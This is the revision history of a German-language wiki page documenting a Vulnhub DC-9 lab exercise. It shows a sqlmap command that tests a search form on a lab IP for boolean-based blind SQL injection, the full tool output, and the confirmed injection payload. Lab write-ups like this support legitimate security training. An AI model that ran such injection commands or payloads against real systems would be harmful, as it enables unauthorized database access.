Thomas.will: /* Testen ob die Boolean Blind Schwäche vorhanden ist */

2023-03-09T09:04:22Z

Testen ob die Boolean Blind Schwäche vorhanden ist

Thomas.will am 9. März 2023 um 09:03 Uhr

2023-03-09T09:03:25Z

Thomas.will am 9. März 2023 um 09:02 Uhr

2023-03-09T09:02:01Z

Thomas.will: Die Seite wurde neu angelegt: „*'''sqlmap -u "http://10.0.10.58/results.php" --data="search=Mary" --technique=B'''…“

2023-03-09T09:01:34Z

Die Seite wurde neu angelegt: „*'''sqlmap -u "http://10.0.10.58/results.php" --data="search=Mary" --technique=B'''…“

Neue Seite

*'''sqlmap -u "http://10.0.10.58/results.php" --data="search=Mary" --technique=B''' 1 ⨯
<pre>
___
__H__
___ ___[.]_____ ___ ___ {1.7.2#stable}
|_ -| . [,] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:00:30 /2023-03-09/

[10:00:30] [INFO] testing connection to the target URL
[10:00:30] [INFO] testing if the target URL content is stable
[10:00:30] [INFO] target URL content is stable
[10:00:30] [INFO] testing if POST parameter 'search' is dynamic
[10:00:30] [INFO] POST parameter 'search' appears to be dynamic
[10:00:30] [WARNING] heuristic (basic) test shows that POST parameter 'search' might not be injectable
[10:00:30] [INFO] testing for SQL injection on POST parameter 'search'
[10:00:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:00:30] [INFO] POST parameter 'search' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="CEO")
[10:00:30] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[10:00:32] [INFO] checking if the injection point on POST parameter 'search' is a false positive
POST parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 18 HTTP(s) requests:
---
Parameter: search (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: search=Mary' AND 8710=8710 AND 'yHal'='yHal
---
[10:00:35] [INFO] testing MySQL
[10:00:35] [INFO] confirming MySQL
[10:00:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[10:00:35] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.0.10.58'

[*] ending @ 10:00:35 /2023-03-09/
</pre>

← Nächstältere Version		Version vom 9. März 2023, 09:03 Uhr
Zeile 1:		Zeile 1:
		+	=Testen ob die Boolean Blind Schwäche vorhanden ist=
	*'''sqlmap -u "http://10.0.10.58/results.php" --data="search=Mary" --technique=B'''		*'''sqlmap -u "http://10.0.10.58/results.php" --data="search=Mary" --technique=B'''
	<pre>		<pre>

← Nächstältere Version		Version vom 9. März 2023, 09:04 Uhr
Zeile 44:		Zeile 44:
	[*] ending @ 10:00:35 /2023-03-09/		[*] ending @ 10:00:35 /2023-03-09/
	</pre>		</pre>
		+	=Erkenntnis=
		+	*Boolean Blind Schwäche vorhanden
		+	Parameter: search (POST)
		+	Type: boolean-based blind
		+	Title: AND boolean-based blind - WHERE or HAVING clause
		+	Payload: search=Mary' AND 8710=8710 AND 'yHal'='yHal

@@ Zeile 1: / Zeile 1: @@
-*'''sqlmap -u "http://10.0.10.58/results.php" --data="search=Mary" --technique=B'''                                                                                         1 ⨯
+*'''sqlmap -u "http://10.0.10.58/results.php" --data="search=Mary" --technique=B'''
 <pre>
          ___

Vulnhub dc-9 sqlmap - Versionsgeschichte

Thomas.will: /* Testen ob die Boolean Blind Schwäche vorhanden ist */

Thomas.will am 9. März 2023 um 09:03 Uhr

Thomas.will am 9. März 2023 um 09:02 Uhr

Thomas.will: Die Seite wurde neu angelegt: „*'''sqlmap -u "http://10.0.10.58/results.php" --data="search=Mary" --technique=B'''…“